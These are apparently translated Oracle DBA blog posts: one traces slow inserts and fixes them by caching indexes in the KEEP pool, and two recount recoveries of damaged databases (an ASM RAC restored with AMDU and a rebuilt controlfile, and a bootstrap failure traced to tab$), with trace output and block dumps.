Last week a carrier customer reported that the loading programs for their billing database had become very slow; through their monitoring, the application team found the slowness was concentrated on inserts into a few tables. As we usually understand it, an insert should be extremely fast, so why would it be slow? And it had reportedly been fine before, which left me quite puzzled. Checking the wait events showed nothing unusual, so I traced the loading program with 10046. The insert into one of the tables the application team flagged as slow was indeed very slow, as shown below:

INSERT INTO XXXX_EVENT_201605C (ROAMING_NBR,.....,OFFER_INSTANCE_ID4)
VALUES
 (:ROAMING_NBR,.....:OFFER_INSTANCE_ID4) 

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse       17      0.00       0.00          0          0          0           0
Execute     18      1.06      27.41       4534        518      33976        4579
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total       35      1.06      27.41       4534        518      33976        4579

Misses in library cache during parse: 1
Misses in library cache during execute: 1
Optimizer mode: ALL_ROWS
Parsing user id: 102  

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      4495        0.03         24.02
  gc current grant 2-way                       2301        0.00          0.77
  SQL*Net more data from client                 795        0.00          0.02
  ......
  latch: gcs resource hash                        1        0.00          0.00

We can see that 4579 rows were inserted in 27.41 seconds, of which 24.02 seconds were spent waiting, and the wait event is db file sequential read.

That normally points to index block reads, and indeed the raw 10046 trace file shows the waits were against the two indexes on this table.
The trace also shows that the SQL is slow mainly because of the large number of physical reads: 4534 physical reads for 4579 inserted rows. What does that tell us? Roughly one physical read per inserted row, and all of them reads of index blocks.
Clearly, caching these indexes in the keep pool should fix the problem, and it did: after caching them, the application reported that the program was much faster.
That still leaves a few questions: why were the physical reads during this insert so high, and how does Oracle's keep pool clean out the objects cached in it?

Let's walk through a simple experiment to illustrate.

First we create two test tables, each with a corresponding index:

SQL> conn roger/roger
Connected.
SQL> create table t_insert as select * from sys.dba_objects where 1=1;

Table created.
SQL> create index idx_name_t on t_insert(object_name);

Index created.

SQL> analyze table t_insert compute statistics for all indexed columns;

Table analyzed.

SQL> select INDEX_NAME,BLEVEL,LEAF_BLOCKS,DISTINCT_KEYS,CLUSTERING_FACTOR,NUM_ROWS from dba_indexes where table_name='T_INSERT';

INDEX_NAME        BLEVEL LEAF_BLOCKS DISTINCT_KEYS CLUSTERING_FACTOR   NUM_ROWS
------------- ---------- ----------- ------------- ----------------- ----------
IDX_NAME_T             1         246         29808             24664      49859

SQL> show parameter db_keep

NAME                                 TYPE        VALUE
------------------------------------ ----------- --------
db_keep_cache_size                   big integer 0
SQL> alter system set db_keep_cache_size=4m;

System altered.

SQL> create table t_insert2 as select * from sys.dba_objects where 1=1;

Table created.

SQL> create index idx_name_t2 on t_insert2(object_name); 

Index created.
SQL> insert into t_insert select * from sys.dba_objects;

49862 rows created.

SQL> commit;

Commit complete.

SQL> insert into t_insert2 select * from sys.dba_objects;

49862 rows created.

SQL> commit;

Commit complete.

From the information above, the index on object_name has a fairly high clustering factor, which means the indexed data is scattered across the table.
Next we cache both indexes in the KEEP pool:

SQL> alter index idx_name_t storage (buffer_pool keep);

Index altered.

SQL> alter index idx_name_t2 storage (buffer_pool keep);

Index altered.
SQL> alter system flush buffer_cache;

System altered.

Note that issuing the ALTER command alone is not enough; we also have to read the index blocks into the KEEP pool ourselves, like this:

SQL> conn /as sysdba
Connected.
SQL> @get_keep_pool_obj.sql

no rows selected

SQL> select /*+ index(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
             99721

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                            499
DEFAULT      T_INSERT                              431

SQL> select /*+ index(idx_name_t2,t_insert2) */ count(object_name) from roger.t_insert2;

COUNT(OBJECT_NAME)
------------------
             99723

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                             40
KEEP         IDX_NAME_T2                           459
DEFAULT      T_INSERT2                             522
DEFAULT      T_INSERT                              431

SQL> select /*+ index(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
             99721

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                            467
KEEP         IDX_NAME_T2                            32
DEFAULT      T_INSERT2                             522
DEFAULT      T_INSERT                              431

SQL>
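
The get_keep_pool_obj.sql script itself is not shown in the post; a query along the following lines (my own sketch, run as SYSDBA, not necessarily the author's script) produces the same SUBCACHE / OBJECT_NAME / BLOCKS listing:

select bp.name       subcache,
       o.object_name,
       count(*)       blocks
  from x$bh bh, x$kcbwds wds, v$buffer_pool bp, dba_objects o
 where bh.set_ds = wds.addr
   and wds.set_id between bp.lo_setid and bp.hi_setid
   and bh.obj = o.data_object_id
 group by bp.name, o.object_name
 order by 1, 2;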

We can roughly see that the KEEP pool also runs an LRU and evicts blocks on a first-in, first-out basis. So why did the INSERTs in the original problem suddenly slow down?

Let's run three INSERT tests.

#### one

SQL> select /*+ index_ffs(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
            149583

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
DEFAULT      SQLPLUS_PRODUCT_PROFILE                 1
DEFAULT      RLM$SCHACTIONORDER                      1
DEFAULT      RLM$JOINQKEY                            1
KEEP         IDX_NAME_T                            499
DEFAULT      T_INSERT2                            2113
DEFAULT      T_INSERT                             2113

6 rows selected.
SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49862 rows created.

Elapsed: 00:00:03.28
SQL> commit;

Commit complete.

Elapsed: 00:00:00.00
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_11661.trc

++++10046 trace

insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.01       0.01          0          0          0           0
Execute      1      0.95       3.07       3289      11592      96374       49862
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      0.96       3.08       3289      11592      96374       49862
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      3168        0.00          0.50
  db file scattered read                          1        0.00          0.00

#### two

SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_13163.trc
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49825 rows created.

++++10046 trace

insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.01       0.01          0          0          0           0
Execute      1      0.87       3.10       3817       8134      87352       49825
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      0.88       3.11       3817       8134      87352       49825
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      3827        0.00          0.56

#### three

SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49825 rows created.

Elapsed: 00:00:03.94
SQL> commit;

Commit complete.

Elapsed: 00:00:00.01
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_13286.trc
SQL> select /*+ index_ffs(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
            249233

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
DEFAULT      SQLPLUS_PRODUCT_PROFILE                 1
......
DEFAULT      RLM$JOINQKEY                            1
KEEP         IDX_NAME_T                            499

++++10046 trace
insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.00       0.00          0          0          0           0
Execute      1      1.60       3.84       7598      13208     104820       49825
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      1.60       3.84       7598      13208     104820       49825
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      7618        0.00          1.07
  free buffer waits                             224        0.02          1.30

The tests show that as the table grows, the INSERT gets slower and slower, and the root cause is the index.
Across the three runs the physical reads keep climbing, and the db file sequential read wait time goes from 0.50s to 0.56s and finally 1.07s. Why?
As the table data keeps growing, the index on it grows too, and because the index keys are highly scattered, each INSERT may fail to find the index blocks it needs in the buffer cache.
Nearly every index block access then becomes a physical read, which inevitably turns into a performance problem.
The default buffer pool can of course cache index blocks, but it has to cache everything else as well, so the index blocks are easily pushed back out. That is why the indexes had to be cached in the KEEP pool.
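
One practical note before pinning indexes into the KEEP pool: check that db_keep_cache_size is large enough to hold them. A rough sanity check along these lines (using the test index names from above; in a real case you would list the production indexes):

select segment_name, bytes/1024/1024 size_mb
  from dba_segments
 where segment_name in ('IDX_NAME_T', 'IDX_NAME_T2');

show parameter db_keep_cache_size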

Related posts:

  1. 11g 新特性之–query result cache(3)

A week-long recovery of a customer's 4 TB Oracle RAC (ASM) database


At the end of June we received an urgent support request: after a power outage in the machine room, the customer's database would not start following the reboot.

A first pass over TeamViewer, reading the alert log and a few disks with kfed, showed that the database could not start because the ASM diskgroup would not mount, and the diskgroup would not mount because its ASM metadata was corrupted; on startup ASM was unable to complete its transaction recovery.

Let's not dwell on why it got corrupted; once ASM metadata is damaged, you can imagine how hard the repair is.

I went for a very simple recovery plan: extract the database files with AMDU, open the database from those copies, then rebuild the original diskgroup and move the database back with RMAN backup as copy.

That was the idea. After a full day of back and forth it turned out the customer could not arrange any extra storage at all, and the free local space on the database server was under 100 GB. The diskgroup was 6 TB and the database files came to roughly 4 TB, so this was clearly going to be awkward.

With no better option the customer bought a 6 TB external USB drive from JD.com. After some effort we got it attached and tested AMDU extraction onto it: about 5 MB/s. Here is a timing test copying a 500 MB undo file to the drive:

root@jlzgdb1 # time dd if=/amdu/datafiles/undotbs2.dbf of=/data/undo_test.dbf bs=8192
64001+0 records in
64001+0 records out

real     1:23.7
user        0.2
sys         2.2

Do the math: at that speed the extraction alone would take around 10 days, and the whole recovery closer to 15, which was unacceptable.

Talking further with the customer, their application server runs Windows, so I shared a folder on Windows over NFS to the Solaris host; AMDU extraction onto that share reached about 15 MB/s. Still very slow, but much better than before, and acceptable to the customer.

Setting up the NFS share between Windows and Solaris was itself a bit of a hassle and took a few hours to sort out. Here are the steps in brief:

--Solaris: start the NFS service
svcadm -v enable -r network/nfs/server

--Windows

Install the NFS server feature

Share the folder and enable NFS sharing on it

Set up the user mapping
nfsfile /v /ru=-2 /rg=-2 /s /cx F:\oradata

--Solaris: mount the NFS share

mount 172.16.30.212:/oradata   /data

The remaining steps were straightforward, standard recovery work. Here is how the files were extracted with AMDU:

......
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.316   -output /data1/irms_data.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.317   -output /data1/irms_data_his.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.318   -output /data1/irms_index.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.319   -output /data1/irms_index_his.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.326   -output /data1/gis_data.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.323   -output /data1/gis_index.dbf
......

Note that AMDU can extract not only datafiles but also the spfile, controlfile, redo logs, archived logs, and so on.

The AMDU commands themselves are simple; the key is knowing the ASM file number of each file inside the diskgroup. Be careful: this is the ASM file number, not the file number inside the database.

In ASM metadata, the alias directory records the mapping between database file names and ASM files, so as long as we can read the alias directory with kfed we can work out each datafile's ASM file number.

Of course, in many cases, if datafiles were added with something like alter tablespace xxx add datafile '+DATA' ..., the ASM file number can be read straight out of the controlfile; I won't go into that here.
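
To illustrate that shortcut: when the datafiles were created OMF-style inside ASM, the name recorded in the controlfile already embeds the ASM file number as the second-to-last dotted component, i.e. +DG/<db>/datafile/<tablespace>.<asm_file#>.<incarnation#>, so with the controlfile mounted a plain query is enough:

select file#, name from v$datafile;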

Finally I checked the extracted datafiles with dbv: only undo had a few corrupt blocks, everything else was fine. Annoyingly, though, a normal recover database then complained that an archived log it needed could not be found. What was going on?

Let's look at the SCNs in the datafile headers.

Judging from the file-header SCNs, the gap was about three hours, and recovery did indeed ask for fairly old archived logs. Reading the ASM diskgroup metadata with kfed, the archived logs covering those hours were nowhere to be found.

Why were they missing? Simple: those three hours amounted to maybe six archived logs, which were very likely still sitting in the storage cache and never made it to disk, so when the power went they were gone.

With archived logs missing, the current redo log files we had extracted with AMDU were useless; the only option was to force the database open and then rebuild it. Here is a brief account of the open and of the errors hit along the way:

First we mounted with the controlfile extracted by AMDU and hit this error:

Sat Jul  2 23:05:15 2016
ALTER DATABASE   MOUNT
Sat Jul  2 23:05:19 2016
Errors in file /var/datang/oracle/admin/xxx/udump/xxx1_ora_6919.trc:
ORA-00600: internal error code, arguments: [kccpb_sanity_check_2], [3811063], [3770626], [0x000000000], [], [], [], []
Sat Jul  2 23:05:19 2016
ORA-600 signalled during: ALTER DATABASE   MOUNT...
Sat Jul  2 23:05:20 2016

 

 

This error is very common in recovery work. Suppose you were seeing it for the first time: how would you work out what it means and what it relates to? The keyword kccpb in the ORA-00600 arguments points at the controlfile, and the name also contains "check", so during mount some consistency check found data it did not like. So what do the two numbers that follow, 3811063 and 3770626, mean?

Some might ask whether they could be SCNs. You cannot rule that out up front, but with a little experience it is easy to dismiss. Why?

First, a database that has been running for over three years cannot have an SCN that small. Second, from Oracle 10g onward a snapshot controlfile backup is produced automatically under ORACLE_HOME/dbs; we can mount with that backup and then check the datafile SCNs.

So what does the error actually mean? My guess was that these are sequence numbers of some kind: during mount Oracle expected to read 3811063 but actually read 3770626, and since the two differ it concluded the controlfile was damaged.

In fact MOS describes this error in detail and also provides the solution; see ORA-00600: [kccpb_sanity_check_2] During Instance Startup (Doc ID 435436.1).

Anyone who has read that note knows the fix is either to restore the controlfile from a backup or to recreate it. So let's recreate the controlfile:

CREATE CONTROLFILE REUSE DATABASE "JLZGDB" NORESETLOGS  ARCHIVELOG
    MAXLOGFILES 192
    MAXLOGMEMBERS 3
    MAXDATAFILES 1024
    MAXINSTANCES 32
    MAXLOGHISTORY 18688
LOGFILE
  GROUP 1 (
    '/data1/redo12.log',
    '/data1/redo11.log'
  ) SIZE 100M,
  GROUP 2 (
    '/data1/redo22.log',
    '/data1/redo21.log'
  ) SIZE 100M,
  GROUP 3 (
    '/data1/redo31.log',
    '/data1/redo32.log'
  ) SIZE 100M,
  GROUP 4 (
    '/data1/redo41.log',
    '/data1/redo42.log'
  ) SIZE 100M
-- STANDBY LOGFILE
DATAFILE
  '/amdu/datafiles/system01.dbf',
  '/amdu/datafiles/undotbs1.dbf',
  '/amdu/datafiles/sysaux.dbf',
  '/amdu/datafiles/users.dbf',
  '/amdu/datafiles/undotbs2.dbf',
  '/data1/irms_data.dbf',
  '/data1/irms_data_his.dbf',
  '/data1/irms_index.dbf',
  '/data1/irms_index_his.dbf',
  '/data1/gis_data.dbf',
  '/data1/gis_index.dbf',
  '/data1/ams_java_data.dbf',
  '/data1/rdms_itf.dbf',
  '/data1/rdms_data.dbf',
  '/data1/rdms_app.dbf',
  '/data1/rdms_indxitf.dbf',
  '/data1/rdms_indxdata.dbf',
  '/data1/rdms_indxapp.dbf',
  '/data1/sde.dbf',
  '/data1/bjdvdata.dbf',
  '/amdu/datafiles/undotbs3.dbf',
  '/data1/nc_data01.dbf'
CHARACTER SET ZHS16GBK
;

After recreating the controlfile we ran an incomplete recovery and then tried to open the database directly, which raised the following error:

Sat Jul  2 23:36:08 2016
Errors in file /var/datang/oracle/admin/jlzgdb/udump/xxx1_ora_22249.trc:
ORA-00600: internal error code, arguments: [2662], [7], [1821589910], [7], [1821750102], [8388617], [], []
Sat Jul  2 23:36:09 2016
Errors in file /var/datang/oracle/admin/xxx/udump/xxx1_ora_22249.trc:
ORA-00600: internal error code, arguments: [2662], [7], [1821589910], [7], [1821750102], [8388617], [], []
Sat Jul  2 23:36:09 2016
Error 600 happened during db open, shutting down database
USER: terminating instance due to error 600
Instance terminated by USER, pid = 22249

This error is also very common, and most people already know the treatment: push the SCN forward. How do we do that here?

Because this database is 10g and does not have the latest PSU installed, we can push the SCN with event 10015 directly:

alter session set events '10015 trace name adjust_scn level n';

Here n is the level. How big should it be? In this case 4*7=28; to be on the safe side we usually go slightly higher, so 30 will do.
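
A sketch of how that would be run here (the database is left mounted with the rebuilt controlfile; level 30 comes from the calculation above):

SQL> alter session set events '10015 trace name adjust_scn level 30';
SQL> alter database open;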

After adjusting the SCN with event 10015 and opening again, the database does open, but it crashes almost immediately with the following error:

*********************************************************************
Database Characterset is ZHS16GBK
Opening with internal Resource Manager plan
where NUMA PG = 1, CPUs = 64
Sat Jul  2 23:49:14 2016
Errors in file /var/datang/oracle/admin/jlzgdb/udump/jlzgdb1_ora_27273.trc:
ORA-00600: internal error code, arguments: [4194], [58], [41], [], [], [], [], []
Doing block recovery for file 2 block 33408
Block recovery from logseq 1, block 61 to scn 32212254769
Sat Jul  2 23:49:15 2016

Again, an extremely common error. For ORA-00600, an argument number in the 4000-6000 range points at undo, and the earlier dbv check had indeed found a handful of corrupt blocks in the undo datafile. So how do we deal with it here?

Since undo is damaged, and the database has to roll back transactions at open time, and rollback depends entirely on undo, there are a few ways to get past the problem (a minimal pfile sketch follows the list):

1. Set undo_management=manual

2. _offline_rollback_segments

3. Event 10513, to stop SMON from doing transaction recovery.
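
A minimal pfile sketch for option 1; the other two options are shown as comments, and the rollback segment names are placeholders rather than values from this system:

*.undo_management='MANUAL'
# alternatives mentioned in the list above:
# *._offline_rollback_segments=('_SYSSMU1$','_SYSSMU2$')
# event='10513 trace name context forever, level 2'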

I obviously went with the first option, the simplest: a quick pfile change fixes it. With that change the database opened without trouble, and the alert log then showed errors like the following:

Sat Jul  2 23:59:20 2016
Errors in file /var/datang/oracle/admin/xxx/bdump/xxx1_j004_6045.trc:
ORA-12012: error on auto execute of job 42567
ORA-08102: index key not found, obj# , file , block  ()
ORA-08102: index key not found, obj# ORA-08102: index key not found, obj# 5099, file 1, block 11186 (2)
, file , block  ()

I am sure plenty of readers have run into this one. The message is explicit: index key not found, so it is an index problem. Which object? obj# 5099. For object numbers above 56 (i.e. not the core bootstrap objects) we can simply rebuild the index.
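
A quick sketch of mapping the obj# to its index and rebuilding it (the owner and index name are whatever dba_objects returns; none is assumed here):

SQL> select owner, object_name, object_type from dba_objects where object_id = 5099;
SQL> -- then, for the index returned above:
SQL> -- alter index <owner>.<index_name> rebuild;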

There were other errors in the alert log that I will not list one by one. As mentioned earlier, with the storage cache lost, a lot of data in the database may be inconsistent; just patching the errors visible in the alert log and handing the system back to the business would carry a great deal of risk, so rebuilding the database is the better recommendation.

We first rebuilt undo, which sidesteps many of the errors, and then got on with rebuilding the database.

Additional notes:

A few MOS documents for reference:

Step by step to resolve ORA-600 4194 4193 4197 on database crash (Doc ID 1428786.1)

Related posts:

  1. 11.2.0.4 ASM RAC 恢复一个例子
  2. 清明节加班恢复的一个11gR2 rac恢复案例

A recovery case: database would not open after a restart


This is a database maintained by an online acquaintance; reportedly it simply would not start again after a normal restart. Let's look at the logs first:

Errors in file /u01/app/oracle/admin/orcl/bdump/orcl1_p012_18165.trc:
ORA-27090: Message 27090 not found;  product=RDBMS; facility=ORA
Linux-x86_64 Error: 4: Interrupted system call
Additional information: 3
Additional information: 128
Additional information: 65536
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl1_p007_18153.trc:
ORA-27090: Message 27090 not found;  product=RDBMS; facility=ORA
Linux-x86_64 Error: 4: Interrupted system call
Additional information: 3
Additional information: 128
Additional information: 65536
Starting ORACLE instance (normal)
LICENSE_MAX_SESSION = 0
.....
SMON: enabling cache recovery
Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_8858.trc:
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_8858.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
.....
Error 704 happened during db open, shutting down database
USER: terminating instance due to error 704

We can see that instance 1 was forcibly terminated and restarted at 9:48:52, and that the node had been throwing ORA-27090 errors since 9:42. That error usually relates to the operating system, which the accompanying Linux-x86_64 Error: 4: Interrupted system call confirms.

Thread 2 advanced to log sequence 334685 (LGWR switch)
  Current log# 4 seq# 334685 mem# 0: +DATA/orcl/onlinelog/group_4.log
.....
Starting ORACLE instance (normal)
LICENSE_MAX_SESSION = 0
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_mmon_9401.trc:
ORA-07445: Message 7445 not found; No message file for product=RDBMS, facility=ORA; arguments: [kgghteFindCB()+188] [SIGSEGV] [Address not mapped to object] [0x00000010B]
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9475.trc:
ORA-07445: exception encountered: core dump [kglsget()+490] [SIGSEGV] [Address not mapped to object] [0x000000008] [] []
.....
Error 0 in kwqmnpartition(), aborting txn
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9943.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
ORA-65535 encountered when generating server alert SMG-4131
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9943.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
Reconfiguration started (old inc 2, new inc 4)
List of nodes:
 0 1
 Global Resource Directory frozen
 Communication channels reestablished
 * domain 0 valid = 1 according to instance 0
......
Completed redo application
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_10551.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_smon_9395.trc:
ORA-00600: Message 600 not found; No message file for product=RDBMS, facility=ORA; arguments: [16659] [kqldtu] [D] [0] [65]
.....
Redo Shipping Client Connected as PUBLIC
-- Connected User is Valid
......
Non-fatal internal error happenned while SMON was doing cursor transient type cleanup.
SMON encountered 1 out of maximum 100 non-fatal internal errors.
.....
Trace dumping is performing id=[cdmp_20160802094934]
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_smon_9395.trc:
ORA-00600: Message 600 not found; No message file for product=RDBMS, facility=ORA; arguments: [16659] [kqldtu] [D] [0] [195]
.....
Non-fatal internal error happenned while SMON was doing cursor transient type cleanup.
SMON encountered 2 out of maximum 100 non-fatal internal errors.
......
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_pmon_9349.trc:
ORA-00474: Message 474 not found; No message file for product=RDBMS, facility=ORA
......
PMON: terminating instance due to error 474
......
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_lmon_9355.trc:
ORA-00474: Message 474 not found; No message file for product=RDBMS, facility=ORA
.....
System state dump is made for local instance
System State dumped to trace file /u01/app/oracle/admin/orcl/bdump/orcl2_diag_9351.trc
......
Shutting down instance (abort)
License high water mark = 72
......
Trace dumping is performing id=[cdmp_20160802095002]
.....
Instance terminated by PMON, pid = 9349
.....
Instance terminated by USER, pid = 11027
.....
Starting ORACLE instance (normal)

Whichever alert log we look at, node 1's or node 2's, the story is the same: SMON failed while performing transaction recovery, the instance eventually died, and after that it could never start normally again. This is clearly the butterfly effect of the forced shutdown.
Let's see what node 2's ORA-600 [16659] means:

ERROR: ORA-600 [16659] [a] [b] [c] [d] [e]
VERSIONS: versions 8.0 to 8.1
DESCRIPTION: We are attempting to update a tab$ row and fail to update the dictionary information correctly.
FUNCTIONALITY: DATA DICTIONARY IMPACT: PROCESS FAILURE POSSIBLE DATA DICTIONARY INCONSISTENCY

According to the description, the data dictionary table tab$ is inconsistent. Annoyingly, the customer's Data Guard standby was broken as well, with exactly the same error.
So recovery it is. The first thing to understand is that node 1's ORA-600 [16703] is essentially the same problem as ORA-600 [16659].
Looking at the errors, Oracle failed during bootstrap initialization at open time, hence ORA-00704: bootstrap process failure.
The approach is simple: trace the open with event 10046 and see which operation the bootstrap was performing when it failed.
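
A minimal sketch of that trace (standard commands, nothing specific to this system):

SQL> startup mount;
SQL> alter session set events '10046 trace name context forever, level 12';
SQL> alter database open;
-- the trace is written to user_dump_dest for this session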

PARSING IN CURSOR #2 len=106 dep=1 uid=0 oct=3 lid=0 tim=1435661277781458 hv=3628073639 ad='cfd74588'
select rowcnt,blkcnt,empcnt,avgspc,chncnt,avgrln,nvl(degree,1), nvl(instances,1) from tab$ where obj# = :1
END OF STMT
PARSE #2:c=999,e=676,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1435661277781453
=====================
.....
BINDS #2:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2b5f7bae1b00  bln=22  avl=02  flg=05
  value=20
EXEC #2:c=999,e=1015,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1435661277798049
WAIT #2: nam='db file sequential read' ela= 1086 file#=1 block#=50 blocks=1 obj#=-1 tim=1435661277799253
WAIT #2: nam='db file sequential read' ela= 568 file#=1 block#=51 blocks=1 obj#=-1 tim=1435661277799931
WAIT #2: nam='db file sequential read' ela= 1804 file#=1 block#=26 blocks=1 obj#=-1 tim=1435661277801863
FETCH #2:c=0,e=3833,p=3,cr=3,cu=0,mis=0,r=0,dep=1,og=4,tim=1435661277801922
*** 2016-08-02 13:52:28.469
ksedmp: internal or fatal error
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
Current SQL statement for this session:
alter database open

From the trace it is clear the failure happens while querying tab$, specifically for obj# = 20. So what is that object?

SQL> select owner,object_name,object_type from dba_objects where object_id=20;

OWNER                          OBJECT_NAME                    OBJECT_TYPE
------------------------------ ------------------------------ -------------------
SYS                            ICOL$                          TABLE

SQL> !oerr ora 1403
01403, 00000, "no data found"
// *Cause:
// *Action:

Based on our query and our understanding of ORA-00600 [16703], [1403], [20], the arguments can be read roughly as follows:

16703: the error code, indicating an inconsistency in a data dictionary base table
1403: no data found (or a mismatch), i.e. "no data found"
20: the object number being accessed, i.e. the object_id

The 10046 trace above also shows that the failing SQL touched three blocks before erroring out: file 1, blocks 50, 51 and 26.
Dumping those three blocks shows the following for blocks 51 and 26:

---block 51
Object id on Block? Y
 seg/obj: 0x3  csc: 0x00.64205  itc: 2  flg: -  typ: 2 - INDEX
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0001.008.0000000d  0x0080118a.0010.01  CB--    0  scn 0x0000.000105c7
0x02   0x000a.01e.000005e0  0x008074fc.007a.36  --U-    1  fsc 0x0000.00064208

Leaf block dump
===============
header address 185777756=0xb12be5c
kdxcolev 0
KDXCOLEV Flags = - - -
kdxcolok 0
kdxcoopc 0x80: opcode=0: iot flags=--- is converted=Y
kdxconco 1
kdxcosdc 2
kdxconro 258
kdxcofbo 552=0x228
kdxcofeo 4484=0x1184
kdxcoavs 3932
kdxlespl 0
kdxlende 0
kdxlenxt 4194360=0x400038
kdxleprv 0=0x0
kdxledsz 8
kdxlebksz 8032
...
row#93[5724] flag: ------, lock: 2, len=14, data:(8):  00 40 38 8e 00 06 02 00
col 0; len 3; (3):  c2 03 03
......

---block 26
Block header dump:  0x0040001a
 Object id on Block? Y
 seg/obj: 0x2  csc: 0x05.e0568950  itc: 2  flg: -  typ: 1 - DATA
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0000.05f.00000002  0x00400012.0001.16  C---    0  scn 0x0000.000000fd
0x02   0x000b.00d.00048164  0x0100982b.b8bd.4d  --U-    7  fsc 0x039f.e0568c3e

data_block_dump,data header at 0xb12be5c
===============
tsiz: 0x1fa0
hsiz: 0x140
pbl: 0x0b12be5c
bdba: 0x0040001a
     76543210
flag=--------
ntab=6
nrow=141
frre=-1
fsbo=0x140
fseo=0x160
avsp=0x20
tosp=0x3db
0xe:pti[0]      nrow=8  offs=0
0x12:pti[1]     nrow=7  offs=8
0x16:pti[2]     nrow=1  offs=15
0x1a:pti[3]     nrow=10 offs=16
0x1e:pti[4]     nrow=15 offs=26
0x22:pti[5]     nrow=100        offs=41
.....
col  0: [ 2]  c1 14
tab 1, row 0, @0x1e65
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 0
tab 1, row 1, @0x1ddb
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 1
tab 1, row 2, @0x1d51
